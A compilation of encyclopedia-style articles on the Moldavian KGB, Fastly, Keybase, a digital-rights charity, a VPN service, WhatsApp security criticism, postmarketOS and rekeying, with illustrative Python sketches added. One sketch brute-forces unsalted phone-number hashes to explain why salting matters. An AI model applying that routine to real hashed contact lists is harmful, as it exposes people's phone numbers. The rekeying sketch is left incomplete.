https://en.wikipedia.org/wiki/Committee%20for%20State%20Security%20of%20the%20Moldavian%20Soviet%20Socialist%20Republic
Committee for State Security of the Moldavian Soviet Socialist Republic
Committee for State Security of the Moldavian Soviet Socialist Republic (Russian: Комитет государственной безопасности Молдавской ССР), also referred to as the KGB of the MSSR or the CSS of Moldavia, was the security agency of the Moldavian Soviet Socialist Republic and the local branch of the Committee for State Security (KGB) of the USSR. On 9 September 1991, the KGB of the MSSR was transformed into the Ministry of National Security (now the Information and Security Service of the Republic of Moldova). Established in 1954, its powers were curtailed by the early 1960s, when the KGB border guard, once subordinated to the Moldavian KGB, began reporting directly to party leaders in Moscow. From July 1972 until its disbandment, the KGB was part of the Council of Ministers of the MSSR. From 1940 to 1991, all chairmen of the KGB were army generals. Today, modern Moldovan intelligence services are largely based on the structure of the KGB, specifically its 5th Division.

Structure
Leadership (chairman, vice chairs, party committee)
Secretariat
1st Division (intelligence)
2nd Division (counterintelligence)
4th Division (secret-political)
5th Division (economic)
7th Division (surveillance)
8th Division (encryption-decryption)
9th Division (protection of party and government leaders)
2nd Special Department
3rd Special Department
4th Special Department
5th Special Department
Manufacturing Department
Communication Department
Investigation Department
Archive Department
Prison Department
Human Resources Department
Mobilization Department
Auxiliary units

Notable people investigated by the KGB
Alexandru Şoltoianu – founder of the National Patriotic Front
Gheorghe Ghimpu – Romanian politician and political prisoner
Valeriu Graur
Alexandru Usatiuc-Bulgăr
Sergiu Rădăuţan – rector of the Chişinău Polytechnical Institute
Nicolae Testemiţanu – rector of the Chişinău State Medical Institute
Boris Alexandru Găină – first secretary of the Teleneshty Regional Committee of the CPM

Chairmen
Iosif Mordovets (May 6, 1954 – March 30, 1955)
Andrei Prokopenko (March 30, 1955 – July 11, 1959)
Ivan Savchenko (1959–1967)
Piotr Chvertko (1967–1975)
Arkady Ragozin (December 17, 1975 – January 19, 1979)
Gavriil Volkov (January 19, 1979 – January 23, 1989)
Georgiy Lavranchuk (January 23, 1989 – June 23, 1990)
Fyodor Botnar (June 23, 1990 – August 29, 1991)
Anatoly Plagara (August 29, 1991)

References Moldavian Soviet Socialist Republic KGB
https://en.wikipedia.org/wiki/Fastly
Fastly
Fastly is an American cloud computing services provider. It describes its network as an edge cloud platform, designed to help developers extend their core cloud infrastructure to the edge of the network, closer to users. The Fastly edge cloud platform includes content delivery network (CDN), image optimization, video and streaming, cloud security, and load balancing services. Fastly's cloud security services include denial-of-service attack protection, bot mitigation, and a web application firewall. Fastly's web application firewall uses the Open Web Application Security Project's ModSecurity Core Rule Set alongside its own ruleset. The Fastly platform is built on top of Varnish. As of December 2021, Fastly's network handled 50–100 Tbps of traffic. History Fastly was founded in 2011 by Artur Bergman, previously chief technology officer at Wikia (now Fandom). In June 2013, Fastly raised $10 million in Series B funding. In April 2014, the company announced that it had acquired CDN Sumo, a CDN add-on for Heroku. In September 2014, Fastly raised a further $40 million in Series C funding, followed by a $75 million Series D round in August 2015. In September 2015, Google partnered with Fastly and other content delivery network providers to offer services to its users. In April 2017, Fastly launched its edge cloud platform along with image optimization, load balancing, and a web application firewall. Fastly raised $50 million in funding in April 2017, and another $40 million in July 2018. The company filed for an initial public offering (IPO) in April 2019 and debuted on the New York Stock Exchange on May 17, 2019. In February 2020, Bergman stepped down as CEO and assumed the role of chief architect and executive chairperson; Joshua Bixby took over the CEO role. In August 2020, Fastly announced it was acquiring cybersecurity company Signal Sciences for $775 million ($200 million in cash and $575 million in stock). In June 2021, Ronald W.
Kisling, previously employed by Alphabet as the CFO of its Fitbit division, was hired to serve as Fastly's CFO, succeeding Adriel Lares; he assumed the position in August 2021. Operation Fastly's CDN service follows the reverse proxy model, routing all website traffic through its own servers instead of providing a 'cdn.mydomain.com' address to store site-specific files. It then serves content from the point of presence nearest to the requesting user, out of nearly 60 worldwide. It is priced as a pay-as-you-go service subject to a US$50 per month minimum charge, with bandwidth charged at variable rates depending on region. Content is not directly uploaded to Fastly's servers; rather, it is pulled periodically from the origin server and cached in order to reduce the time required for an end user to access the content. Fastly supports the UDP-based HTTP/3 protocol, as well as DRM-enabled content, encryption, and secure tokens to restrict media access. On 8 June 2021, Fastly reported problems with its CDN service that caused many major websites, such as Reddit, gov.uk, Twitch, Spotify and Amazon, along with major news sources such as The New York Times, The Guardian, CNN and the BBC, to become unavailable. The affected tech news outlet The Verge resorted to using Google Docs to report on the ongoing outage. The outage also affected parts of other major websites, such as the servers hosting the emoji used by Twitter, rendering them inaccessible. The outage was resolved by Fastly after a few hours. Fastly has since stated that the cause of the outage was a software bug triggered by a specific user configuration.
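The pull-based caching model described above — content fetched from the origin server on the first request and served from cache until it goes stale — can be sketched as follows. This is an illustrative sketch of the general pull-through pattern, not Fastly's actual implementation; the `origin_fetch` callable, the TTL value, and the in-memory store are all assumptions for the example.

```python
import time


class PullThroughCache:
    """Minimal sketch of a CDN-style pull-through cache (illustrative only)."""

    def __init__(self, origin_fetch, ttl_seconds=300):
        self.origin_fetch = origin_fetch  # callable: path -> content
        self.ttl = ttl_seconds           # how long a cached copy stays fresh
        self.store = {}                  # path -> (content, fetched_at)

    def get(self, path):
        entry = self.store.get(path)
        if entry is not None:
            content, fetched_at = entry
            if time.time() - fetched_at < self.ttl:
                return content  # cache hit: served without contacting the origin
        # cache miss or stale entry: pull from the origin server and re-cache
        content = self.origin_fetch(path)
        self.store[path] = (content, time.time())
        return content
```

The key property is visible in use: repeated requests for the same path within the TTL reach the origin only once, which is what reduces end-user latency.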
References External links 2011 establishments in California 2019 initial public offerings American companies established in 2011 Cloud computing providers Cloud platforms Companies based in San Francisco Companies listed on the New York Stock Exchange Computer security companies Content delivery networks DDoS mitigation companies Internet properties established in 2011 Internet security Software companies based in the San Francisco Bay Area Software companies established in 2011 Software companies of the United States
https://en.wikipedia.org/wiki/Keybase
Keybase
Keybase is a key directory that maps social media identities to encryption keys (including, but not limited to, PGP keys) in a publicly auditable manner. Additionally, it offers an end-to-end encrypted chat and a cloud storage system, called Keybase Chat and the Keybase Filesystem, respectively. Files placed in the public portion of the filesystem are served from a public endpoint, as well as locally from a filesystem mounted by the Keybase client. Keybase supports publicly connecting Twitter, GitHub, Reddit, Hacker News, and Mastodon identities, as well as websites and domains under one's control, to encryption keys. It also supports Bitcoin, Zcash, Stellar, and QRL wallet addresses. Keybase had supported Coinbase identities since its initial public release, but ceased to do so on March 17, 2017, when Coinbase terminated public payment pages. In general, Keybase allows any service with public identities to integrate with Keybase. On May 7, 2020, Keybase announced it had been acquired by Zoom, as part of Zoom's "plan to further strengthen the security of our video communications platform". Identity proofs Keybase allows users to prove a link between certain online identities (such as a Twitter or Reddit account) and their encryption keys. Instead of using a system such as OAuth, identities are proven by posting a signed statement as the account a user wishes to prove ownership of. This makes identity proofs publicly verifiable: instead of having to trust that the service is being truthful, a user can find and check the relevant proof statements themselves, and the Keybase client does this automatically. App In addition to the web interface, Keybase offers a client application for Windows, Mac, Android, iOS, and most desktop Linux distributions, written in Go with an Electron front end.
The app offers features beyond those of the website, such as the end-to-end encrypted chat, the teams feature, and the ability to add files to and access private files in users' personal and team Keybase Filesystem storage. Each device running the client app is authorized by a signature made either by another device or by the user's PGP key. Each device is also given a per-device NaCl (pronounced "salt") key to perform cryptographic operations. Chat Keybase Chat is an end-to-end encrypted chat built into Keybase, launched in February 2017. A distinguishing feature of Keybase Chat is that it allows Keybase users to send messages to someone using their online aliases (for example, a Reddit account), even if they haven't signed up to Keybase yet. If the recipient (the online alias owner) has an account on Keybase, they will seamlessly receive the message. If the recipient doesn't have a Keybase account and later signs up and proves the link between the online account and their devices, the sender's device will rekey the message for the recipient based on the public proof they posted, allowing them to read the message. Since the Keybase app checks the proof, it avoids trust on first use. Keybase Filesystem (KBFS) Keybase allows users to store up to 250 GB of files for free in a cloud storage system called the Keybase Filesystem. There are no storage upgrades available, but paid plans allowing for more data are planned. The filesystem is divided into three parts: public files, private files, and team files. On Unix-like machines, the filesystem is mounted at /keybase, and on Microsoft Windows systems it is usually mounted as the K: drive. Currently, mobile versions of the Keybase client can only download files from KBFS and cannot mount it. However, they do support operations such as rekeying files as necessary. In October 2017, Keybase introduced end-to-end encrypted Git repositories. Public files Public files are stored in /public/username, and are publicly visible.
All files in the public filesystem are automatically signed by the client. Only the user the folder is named after can edit its contents; however, a folder may be named after a comma-separated list of users (e.g. a folder /public/foo,bar,three would be editable by the users foo, bar, and three). Public files can be accessed by any user. Single user folders are displayed at and are also accessible by opening the directory in the mounted version of the filesystem. Multi-user folders (such as /public/foo,bar,three) are only accessible through the mounted version of the filesystem. Private files Private files are stored in /private/username, and are only visible to username. Private folders, like public folders, can be named after more than one user (e.g. a folder /private/foo,bar,three would be readable and editable by the users foo, bar, and three). Folder access can also be made read-only for users listed after a "#" (e.g. a folder /private/writer1,writer2,#reader1,reader2 would be readable and editable by the users writer1 and writer2, but only readable by reader1 and reader2). Unlike public files, all private files are both encrypted and signed before being uploaded, making them end-to-end encrypted. Team files Team files are stored in /team/teamname, and are visible only to team members. All files in the team filesystem are automatically encrypted and signed by the client. Only users who are marked as writers can edit a team folder's contents; however, any reader can access the files stored there. Teams In September 2017, Keybase launched Keybase Teams. A team is described as "...a named group of people." Each team has a private folder in the Keybase filesystem, and a number of chat channels (similar to Slack). Teams can also be divided into "subteams" by placing a . in the team name. For example, wikipedia.projects would be a subteam of wikipedia, while wikipedia.projects.foobar would be a subteam of wikipedia.projects (and therefore, also of wikipedia).
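The two naming conventions above — comma-separated writers with read-only users after a "#" in KBFS folder names, and dotted subteam names — can be illustrated with two small helper functions. These are sketches of the conventions as described, not Keybase's actual path- or team-handling code; the function names are invented for the example.

```python
def parse_kbfs_folder(path):
    """Split a KBFS folder path such as '/private/writer1,writer2#reader1,reader2'
    into (writers, readers), following the convention described above.
    Empty entries (e.g. from a trailing comma before '#') are ignored."""
    name = path.rstrip("/").rsplit("/", 1)[-1]        # last path component
    writers_part, _, readers_part = name.partition("#")
    writers = [u for u in writers_part.split(",") if u]
    readers = [u for u in readers_part.split(",") if u]
    return writers, readers


def is_subteam(child, parent):
    """Per the dotted naming rule: wikipedia.projects.foobar is a subteam of
    wikipedia.projects and, transitively, of wikipedia."""
    return child.startswith(parent + ".")
```

For example, `parse_kbfs_folder("/private/foo,bar,three")` yields three writers and no readers, while a "#" in the name splits writers from read-only users; `is_subteam` is just a prefix check on the dotted name.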
Team administration Teams are largely administered by adding signatures to a chain. Each signature can add, remove, or change a user's membership in a team, and likewise records changes made to subteams. Each chain starts with a signature made by the team owner, with subsequent actions signed by team admins or users. This ensures that every action is made by an authorized user, and that actions can be verified by anyone in possession of the public key used. References External links Keybase on GitHub Key management OpenPGP Free software programmed in Go Tor onion services Computer-related introductions in 2014 2020 mergers and acquisitions
https://en.wikipedia.org/wiki/Digital%20Rights%20Watch
Digital Rights Watch
Digital Rights Watch is an Australian charity organisation founded in 2016 that aims to educate Australian citizens about their digital rights and to uphold those rights. History In 2016, largely in response to the introduction of Australia's mandatory metadata retention scheme, Digital Rights Watch was created at a meeting of representatives from Australian human rights organisations, activists, political advisers, technology consultants and academics. To coordinate a civil society response to the metadata retention scheme as well as other key digital rights violations, a new organisation was founded with the aim of aligning and supporting existing efforts. Focus Digital Rights Watch's mission is to ensure that Australian citizens are equipped, empowered and enabled to uphold their digital rights. The organisation works on advocacy, policy reform and public-facing campaigns that push for ethical data use by corporations, good digital government practices and policies, a rights-based legal system, and empowered and informed citizens. Structure Digital Rights Watch is an incorporated association, registered as a national charity with the Australian Charities and Not-for-profits Commission. It is a member-run organisation, with a board of directors elected once a year at its Annual General Meeting. The organisation also operates an Advisory Council, which informs and advises on policy and strategy. Digital Rights Watch is a member of the CIVICUS World Alliance for Citizen Participation, the Australian Digital Inclusion Alliance, and the global Keep It On campaign. In October 2017, Digital Rights Watch's chair, Tim Singleton Norton, received a special mention in the Access Now Global Heroes and Villains of Human Rights Awards. Digital Rights Watch often works in partnership with other Australian digital or human rights organisations such as the Human Rights Law Centre, Amnesty International Australia, Electronic Frontiers Australia, the Australian Privacy Foundation, ACFID and others.
Digital Rights Watch also works with international groups such as Access Now, the Electronic Frontier Foundation, OpenMedia, EDRi, Privacy International and others. Campaigns In August 2016, Digital Rights Watch coordinated a campaign, including media coverage, expressing concern over privacy issues raised in the Australian national census. On 13 April 2017, Digital Rights Watch declared a national day of action against mandatory data retention, calling for all Australians to 'Get a VPN'. In August 2017, Digital Rights Watch hosted an event as part of the Melbourne Writers Festival in which they profiled the personal metadata footprint of Professor Gillian Triggs, former President of the Australian Human Rights Commission. In September 2017, Digital Rights Watch partnered with Privacy International to push for greater transparency over intelligence-sharing operations between governments. In May 2018, Digital Rights Watch launched the State of Digital Rights report, outlining several ways in which Australian citizens' digital rights are being eroded. Between October and December 2018, Digital Rights Watch coordinated a public campaign, the Alliance for a Safe and Secure Internet, against proposed legislation that gave law enforcement increased powers to break encryption protocols. In May 2019, Digital Rights Watch partnered with Electronic Frontiers Australia to launch the Save Australian Technology campaign. References External links Digital Rights Watch website Digital Rights Watch ACNC register Political organisations based in Australia Privacy organizations Human rights organisations based in Australia Advocacy groups in Australia Digital rights organizations
https://en.wikipedia.org/wiki/SaferVPN
SaferVPN
SaferVPN is a VPN service developed by Safer Social, Ltd. The network protects user data from Wi-Fi security risks through end-to-end encryption of user connections. History SaferVPN was released in 2013 by cybersecurity software developers, including founders Amit Bareket and Sagi Gidali. SaferVPN's parent company began raising capital after creating and patenting a system designed to aid law enforcement in identifying and catching car thieves. The first application that cofounders Amit Bareket and Sagi Gidali built together took second place in the Microsoft Imagine Cup competition. SaferVPN's network infrastructure later served as the basis for the initial product development of Bareket and Gidali's next company, Perimeter 81. Technology SaferVPN uses several VPN protocols to secure data transmitted over its network; the protocols differ in how the data is secured. SaferVPN's supported protocols include: OpenVPN, a widely used protocol favoured for its combination of performance and security. Point-to-Point Tunneling Protocol (PPTP), a commonly used VPN protocol that uses only basic encryption, giving users fast connection speeds. Layer 2 Tunneling Protocol (L2TP/IPsec), secure but slower than other protocols; a good option when OpenVPN or IKEv2 are unavailable. Unlike PPTP, L2TP/IPsec requires a shared key or the use of certificates. IKEv2, the newest protocol available; the fastest of the protocols, secure and stable, but not supported on all platforms. See also Comparison of virtual private network services References Virtual private network services Software
https://en.wikipedia.org/wiki/Reception%20and%20criticism%20of%20WhatsApp%20security%20and%20privacy%20features
Reception and criticism of WhatsApp security and privacy features
This article provides a detailed chronological account of the historical reception and criticism of security and privacy features in the WhatsApp messaging service. 2011 On May 20, 2011, an unidentified security researcher from the Netherlands writing under the pseudonym "WhatsappHack" published, on the Dutch websites Tweakers.net and GeenStijl, a method to hijack WhatsApp accounts using a flaw in the authentication process. The method involved trying to log in to a person's account from another phone number and intercepting the verification text message that would be sent out. "WhatsappHack" provided methods to accomplish this on both the Symbian and Android operating systems. One day after the publication of the articles, WhatsApp issued a patch for both the Android and Symbian clients. In May 2011, another security hole was reported which left communication through WhatsApp susceptible to packet analysis. WhatsApp communications data was sent and received in plaintext, meaning messages could easily be read if packet traces were available. 2012 In May 2012, security researchers noticed that new updates of WhatsApp sent messages with encryption, but described the cryptographic method used as "broken". In August of the same year, the WhatsApp support staff stated that messages sent in the "latest version" of the WhatsApp software for iOS and Android (but not BlackBerry, Windows Phone, and Symbian) were encrypted, but did not specify the cryptographic method. On January 6, 2012, an unknown hacker published a website that made it possible to change the status of any WhatsApp user whose associated phone number was known. On January 9, WhatsApp reported that it had resolved the problem. In reality, its solution had merely been to block the website's IP address, and a Windows tool was soon made available that could accomplish the same thing.
This problem has since been resolved through an IP address check on currently logged-in sessions. On September 14, 2012, Heise Security demonstrated how to use WhatsAPI to hijack any WhatsApp account. Shortly afterward, WhatsApp threatened to initiate legal action against the developers of WhatsAPI, an open-source project, and WhatsAPI temporarily took down its source code. This, however, did not address the underlying security failure, and Heise Security claimed it had been able to successfully repeat the hijacking of WhatsApp accounts. The WhatsAPI team has since resumed active development. 2013–2015 On March 31, 2013, the Saudi Arabia Communications and Information Technology Commission (CITC) issued a statement that mentioned possible measures against WhatsApp, among other applications, unless the service providers took serious steps to comply with monitoring and privacy regulations. In February 2014, the data protection authority of the German state of Schleswig-Holstein advised against using WhatsApp, as the service lacked privacy protections such as end-to-end client-side encryption technology. In late 2014, WhatsApp began its implementation of end-to-end encryption, which it finished in April 2016. A joint Canadian-Dutch government investigation was launched into several concerns over WhatsApp's compliance with security regulations. The primary concern of the investigators was that WhatsApp required users to upload their mobile phone's entire address book, including contact information for contacts who were not using WhatsApp, to be mirrored on WhatsApp's servers. While WhatsApp stored these phone numbers in hashed form, the hashes were not salted. In late 2015, the Dutch government released a press statement claiming that WhatsApp had changed its hashing method, making it much harder to reverse, and had thus subsequently complied with all rules and regulations.
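The investigators' concern about unsalted hashes can be made concrete: phone numbers come from a small, enumerable space, so an unsalted hash can be reversed by simple brute force, whereas a per-record salt defeats precomputed lookup tables. The following standard-library sketch illustrates the principle; the number format, prefix, and salt size are illustrative assumptions, not details of WhatsApp's actual scheme.

```python
import hashlib
import os


def hash_unsalted(phone):
    """Hash a phone number directly -- reversible by enumerating candidates."""
    return hashlib.sha256(phone.encode()).hexdigest()


def hash_salted(phone, salt):
    """Prepend a random per-record salt, so precomputed tables are useless."""
    return hashlib.sha256(salt + phone.encode()).hexdigest()


def reverse_unsalted(target_hash, prefix="+3160000", digits=4):
    """Brute-force an unsalted hash by enumerating the (small) number space.
    The hypothetical prefix keeps the example fast; a real attacker would
    sweep entire national numbering plans the same way."""
    for n in range(10 ** digits):
        candidate = prefix + str(n).zfill(digits)
        if hash_unsalted(candidate) == target_hash:
            return candidate
    return None
```

With a salt, the same phone number produces a different digest in every record, so an attacker must brute-force each record separately instead of hashing the number space once.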
On December 1, 2014, Indrajeet Bhuyan and Saurav Kar demonstrated the WhatsApp Message Handler vulnerability, which allowed anyone to remotely crash WhatsApp just by sending a specially crafted 2 KB message. A user who received such a message had to delete the whole conversation to avoid crashing WhatsApp upon opening it. In early 2015, after WhatsApp launched a web client that could be used from the browser, Bhuyan found that the client had two new security issues: the WhatsApp photo privacy bug and the WhatsApp web photo sync bug. 2016 On March 2, 2016, WhatsApp introduced a document-sharing feature that allowed users to share PDF files with contacts. WhatsApp received criticism, however, over the default setting to automatically download attachments, which raised concerns about the downloading of malware and malicious files once the feature expanded to include more than just PDFs. In August 2016, WhatsApp announced that it would start sharing account information, such as the phone number of the account owner and aggregated analytical data, with Facebook. WhatsApp claimed that the address books, message content, and metadata of users would not be shared. According to WhatsApp, this account information is shared to "track basic metrics about how often people use our services and better fight spam on WhatsApp. And by connecting your phone number with Facebook's systems, Facebook can offer better friend suggestions and show you more relevant ads if you have an account with them." It was further stated that "User data will not be shared with advertisers, and is only used internally on the Facebook services," and that users would be given the choice to opt out of sharing this data with Facebook for advertisement purposes.
In October 2016, the Article 29 Working Party stated that it had serious concerns regarding the way that the information relating to the updated Terms of Service and Privacy Policy was provided to users, and, consequently, about the validity of the users' consent. Since the client release of April 5, 2016, end-to-end encryption has been supported for all of a user's communications, including file transfers and voice calls. It uses Curve25519 for key exchange, HKDF for generation of session keys (AES-256 in CBC mode for encryption and HMAC-SHA256 for integrity verification), and SHA-512 for generating the two 30-digit fingerprints of both users' identity keys, so that users can verify the encryption. The encryption prevents even the company itself from being able to decrypt users' communications. This update was received well by security professionals and privacy enthusiasts, and the move was praised by Amnesty International. The US Federal Bureau of Investigation criticized the update as threatening the work of law enforcement. WhatsApp has a score of 6 out of 7 points on the Electronic Frontier Foundation's "Secure Messaging Scorecard". It received points for having communications encrypted in transit, having communications encrypted with keys the provider doesn't have access to, allowing users to verify contacts' identities, having past messages secure if the encryption keys are stolen, having completed a recent independent security audit, and having the security designs properly documented. The missing seventh point is for the code not being open to independent review. 2017 On January 15, 2017, a research team from Ruhr University Bochum published a security analysis of group messaging protocols in WhatsApp and other messaging services, which found a privacy concern in that WhatsApp's servers effectively control membership in groups.
The report found that it would therefore be possible to add arbitrary phone numbers to a group chat, such that future communication becomes insecure. In October 2017, the German software company Open-Xchange criticized WhatsApp, among others, for using proprietary software and stated plans to create an open-source alternative. The Guardian incident On January 13, 2017, The Guardian reported that security researcher Tobias Boelter had found WhatsApp's policy of forcing re-encryption of initially undelivered messages, without informing the recipient, to constitute a loophole whereby WhatsApp could disclose the content of these messages. WhatsApp and Open Whisper Systems officials disagreed with this assessment. After complaints from 73 security researchers, The Guardian substantially revised and corrected its articles, and a follow-up article from Boelter was removed. In June 2017, The Guardian readers' editor Paul Chadwick wrote that "The Guardian was wrong to report in January that the popular messaging service WhatsApp had a security flaw so serious that it was a huge threat to freedom of speech." Chadwick also noted that since the Guardian article, WhatsApp had been "better secured by the introduction of optional two-factor verification in February." 2019 In May 2019, it was revealed that there was a security vulnerability in WhatsApp that allowed a remote attacker to install spyware just by placing a call, which did not even need to be answered. Later, in June 2019, another vulnerability was revealed that allowed a user to transform an audio call into a video call without the victim's consent and without the victim noticing. A bug bounty of US$5,000 was offered for this bug. In December 2019, WhatsApp confirmed a security flaw that would allow hackers to use a malicious GIF image file to gain access to the recipient's data. The flaw was first reported by a user named Awakened on GitHub with an explanation of how the exploit worked.
When the recipient opened the gallery within WhatsApp, even without sending the malicious image, the hack was triggered and the device and its contents became vulnerable. The flaw was patched, and users were encouraged to update WhatsApp. In June 2019, WhatsApp announced that it would take legal action against users who send a disproportionately high number of messages using its communication platform. The company reiterated that its platform was meant for private messaging or for businesses to interact with their customers through their business app. In a notification on its website, the company stated: "Beginning on December 7, 2019, WhatsApp will take legal action against those we determine are engaged in or assisting others in abuse that violates our terms of service, such as automated or bulk messaging". In September 2019, WhatsApp was criticized for its implementation of a 'delete for everyone' feature. iOS users can elect to save media to their camera roll automatically. When a user deletes media for everyone, WhatsApp does not delete images saved in the iOS camera roll, and so those users are able to keep the images. WhatsApp released a statement saying that "the feature is working properly," and that images stored in the camera roll cannot be deleted due to Apple's security layers. In November 2019, WhatsApp released a new privacy feature that let users decide who can add them to groups. In late 2019, anonymous developers released GBWhatsApp, a modified, unofficial version of WhatsApp. It closely resembles the official client in interface, message sending and receiving, and installation, but adds features that the official WhatsApp lacks. On December 17, 2019, WhatsApp fixed a security flaw that allowed cyber attackers to repeatedly crash the messaging application for all members of a group chat; the problem could only be fixed by forcing a complete uninstall and reinstall of the app. The bug was discovered by Check Point in August 2019 and reported to WhatsApp. It was fixed in version 2.19.246 onwards. 2020 In April 2020, WhatsApp sued the NSO Group for allegedly using the spyware it produces to hack at least 1,400 WhatsApp users. NSO Group responded by claiming that it is not responsible for, and cannot control, how its clients use its software. According to research by Citizen Lab, countries which may have used the software to hack WhatsApp include Saudi Arabia, Bahrain, Kazakhstan, Morocco, Mexico and the United Arab Emirates. On 16 December 2020, as part of an anti-trust case against Google, a complaint was made that WhatsApp gave Google access to private messages. The complaint was heavily redacted, due to being part of an ongoing case, and therefore it cannot be determined whether the claim alleges tampering with the app's end-to-end encryption or Google accessing user backups. 2021 In January 2021, WhatsApp announced an update to its Privacy Policy stating that WhatsApp would collect the metadata of users and share it with Facebook and its "family of companies" starting in February 2021. Previously, users could opt out of such data sharing, but this would no longer be an option. The new policy would not fully apply within the EU, in order to comply with the GDPR.
The new policy does not allow WhatsApp or Facebook to read messages, which remain end-to-end encrypted, but it allows Facebook to see data such as what phone and operating system a user has, the user's time zone, IP address, profile picture, status, phone number, app usage, and all of the contacts stored in WhatsApp. This move drew intense criticism of Facebook and WhatsApp, with critics claiming that it erodes users' privacy. Facing pushback and a lack of clarity about Facebook data sharing, WhatsApp postponed the implementation of the updated privacy policy from February 8, 2021, to May 15, 2021, but announced it had no plans to limit the functionality of the app for those who don't approve the new terms or to give them persistent reminders to do so. ProPublica investigation In September 2021, ProPublica published an extensive investigation into WhatsApp's use of outside contractors and artificial intelligence systems to examine user communication, and its collaboration with law enforcement. The investigation includes information from a complaint filed by a whistleblower with the U.S. Securities and Exchange Commission. Internal WhatsApp company documents revealed Facebook's considerable efforts to brand WhatsApp as "a paragon of privacy". WhatsApp employs around 1,000 contractors in their 20s and 30s, via Accenture, at offices in Austin, Texas, Dublin and Singapore. Their job is to review content reported by WhatsApp users, and pay starts at $16.50/hour. When a user flags a message they've received, it and the previous four messages are decrypted and sent to this content review team. A reviewer has less than a minute to decide whether to do nothing, place the user on a watch list, or ban them. Due to pranks, ambiguous content, language nuances and translation errors, the process is prone to misunderstandings. 
WhatsApp also uses artificial intelligence systems to scan unencrypted data collected from users (profile image and status; phone number, IMEI and OS; names and images of the user's WhatsApp groups; a list of the user's electronic devices; any Facebook or Instagram accounts) and compares it against suspicious patterns or terms and images previously deemed abusive. WhatsApp shares message metadata with law enforcement agencies such as the Department of Justice. If legally required, or at its own discretion (such as for investigating Facebook leaks), it can provide critical location or account information, or real-time data on whom a target subject is messaging. WhatsApp message metadata has been used to help jail people such as whistleblower Natalie Edwards. In 2020, WhatsApp reported 400,000 instances of possible child-exploitation imagery to the National Center for Missing & Exploited Children.
https://en.wikipedia.org/wiki/PostmarketOS
PostmarketOS
PostmarketOS (stylized as postmarketOS and abbreviated as pmOS) is a free and open-source operating system primarily for smartphones, based on the Alpine Linux distribution. PostmarketOS was launched on May 6, 2017, with the source code available on GitLab. It is capable of running different X and Wayland based user interfaces, such as Plasma Mobile, MATE, GNOME 3, and Xfce; later updates added support for Unity8 and Phosh. It is also capable of running Docker if the device-specific kernel has cgroups and the relevant configs enabled. The project aims to provide a ten-year lifecycle for smartphones. Architecture Unlike many other projects porting conventional Linux distributions to Android phones, postmarketOS does not use the Android build system or userspace. Each phone has only one unique package, and flashable installation images are generated using the pmbootstrap tool. The project intends to support the mainline Linux kernel on all phones in the future, instead of the often outdated Android-specific fork, to reduce the potential for security exploits. A few devices can already boot into the mainline kernel. The project aims to support Android apps, originally through the use of Anbox, which was replaced by Waydroid as of postmarketOS v21.12. Alpine Linux was chosen as the base distribution due to its low storage requirements, making it more suitable for older devices. Excluding the kernel, a base installation takes up approximately 6 MB. State of development Features Different tools have been published by the project, including: pmbootstrap, a utility to help the process of development with cross compilation; osk-sdl, an on-screen keyboard that allows entering the passphrase to unlock full disk encryption during startup; charging-sdl, an application contained in the initramfs to display an animation when the phone is charging while off. 
Device support As of May 2020, over two hundred devices are able to boot the operating system, including 92 with Wi-Fi support. This includes many smartphones and tablets that originally ran Android, as well as some Linux-based Nokia smartphones, such as the N900 and N9. After Corellium's Project Sandcastle ported the Linux kernel to some iPhone models, postmarketOS was also seen to boot on them, although no persistent flashing is supported at the moment. As of May 2021, support for wearable devices (including Google Glass and smartwatches like the LG G Watch) has been improved through integration with the AsteroidOS user interface and work on a mainline kernel for the LG G Watch R. In 2018, no devices were yet able to make phone calls with postmarketOS, although significant efforts were being made in this regard. By 2020, a number of devices were fully or mostly supported, including for phone calls, SMS messages and mobile data. These included the BQ Aquaris X5, Librem 5, Nokia N900, Motorola Moto G4 Play, Samsung Galaxy A3 (2015), Samsung Galaxy A5 (2015), and Wileyfox Swift. Furthermore, postmarketOS was launched as a first-party operating system for the PinePhone, with the postmarketOS Community Edition. Porting to a new device The development process to make a new device compatible with the operating system consists of creating a phone-specific package using the pmbootstrap tool. For that, the use of the Linux kernel from the device's original manufacturer is often necessary. The source code of the original kernel is often made available in compliance with the requirements of the GPLv2 license, but some drivers necessary for the operation of the device may not be available and must therefore be recreated. Examples include GPU drivers such as Lima, whose proprietary equivalent runs in userspace on Android and is therefore not subject to the GPLv2 requirements. 
See also List of open-source mobile phones Librem 5 PinePhone Android rooting Comparison of mobile operating systems LineageOS Replicant Ubuntu Touch Sailfish OS LuneOS Plasma Mobile References External links Source code on GitLab Embedded Linux distributions Free mobile software Linux distributions without systemd Software forks Linux distributions
https://en.wikipedia.org/wiki/Rekeying%20%28cryptography%29
Rekeying (cryptography)
In cryptography, rekeying refers to the process of changing the session key—the encryption key of an ongoing communication—in order to limit the amount of data encrypted with the same key. Roughly equivalent to the classical procedure of changing codes on a daily basis, the key is changed after a pre-set volume of data has been transmitted or a given period of time has passed. In contemporary systems, rekeying is implemented by forcing a new key exchange, typically through a separate protocol like Internet Key Exchange (IKE). The procedure is handled transparently to the user. A prominent application is Wi-Fi Protected Access (WPA), the extended security protocol for wireless networks that addresses the shortcomings of its predecessor, WEP, by frequently replacing session keys through the Temporal Key Integrity Protocol (TKIP), thus defeating some well-known key recovery attacks. In public key infrastructure, rekeying (or "re-keying") leads to the issuance of a new certificate (in contrast to certificate renewal, the issuance of a new certificate for the same key, which is usually not allowed by CAs). See also Diffie–Hellman key exchange Elliptic-curve Diffie–Hellman IPsec and Internet Key Exchange (IKE) Over the Air Rekeying (OTAR) References External links OpenSSH: KeyRegenerationInterval parameter, ~R command Encryption devices
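The volume- and time-based rekeying policy described above can be sketched in Python. This is a local toy, assuming a hash ratchet for key replacement: real systems such as IKE negotiate the fresh key with the peer, and all class, method, and parameter names here are illustrative.

```python
import hashlib
import time

class RekeyingSession:
    """Toy session that replaces its key after a data-volume or time limit.

    Illustrative only: a real protocol negotiates the new key with the
    peer instead of ratcheting locally as done here.
    """

    def __init__(self, initial_key: bytes, max_bytes: int = 1_000_000,
                 max_age_seconds: float = 3600.0):
        self.key = initial_key
        self.max_bytes = max_bytes
        self.max_age = max_age_seconds
        self.bytes_sent = 0
        self.key_created = time.monotonic()

    def _rekey(self) -> None:
        # Derive a fresh key one-way from the old one, then reset counters.
        self.key = hashlib.sha256(b"rekey" + self.key).digest()
        self.bytes_sent = 0
        self.key_created = time.monotonic()

    def send(self, data: bytes) -> bytes:
        # Rekey before the pre-set volume or age limit would be exceeded.
        if (self.bytes_sent + len(data) > self.max_bytes or
                time.monotonic() - self.key_created > self.max_age):
            self._rekey()
        self.bytes_sent += len(data)
        # Stand-in for actual encryption under self.key.
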